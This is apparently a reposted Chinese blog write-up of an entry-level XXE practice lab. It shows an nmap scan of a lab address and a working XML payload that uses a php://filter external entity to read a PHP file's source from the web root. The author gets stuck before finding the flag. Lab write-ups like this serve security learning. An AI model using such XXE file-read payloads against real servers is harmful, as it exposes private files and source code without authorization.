當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

XXE Lab：1题解

發布時間：2025/6/15 编程问答 23 豆豆

生活随笔收集整理的這篇文章主要介紹了 XXE Lab：1题解小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

思路

題目已經提示是XXE的專項練習，所以，直接找XXE問題.

難度

入門

端口掃描

nmap -sS -A 10.129.10.64

發現HTTP服務、Apache 2.4.27中間件、robots.txt泄漏了目錄和文件

80端口檢查

其中，/xxe/index.php頁面通過xml格式提交用戶名和密碼，于是，此處即為XXE所在位置。
構造如下payload，讀取頁面源碼，獲得一不知是flag還是flag Hint的內容：

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE a [<!ENTITY admin SYSTEM "php://filter/convert.base64-encode/resource=file:///var/www/html/xxe/flagmeout.php">]> <root><name>&admin;</name><password>123</password></root>

響應：

于是，陷入蒙蔽。。。。等待作者反饋中

轉載于:https://blog.51cto.com/executer/2314187

總結

以上是生活随笔為你收集整理的XXE Lab：1题解的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。

上一篇： Mango 的组织重构
下一篇： go语言初体验（流程控制、range遍历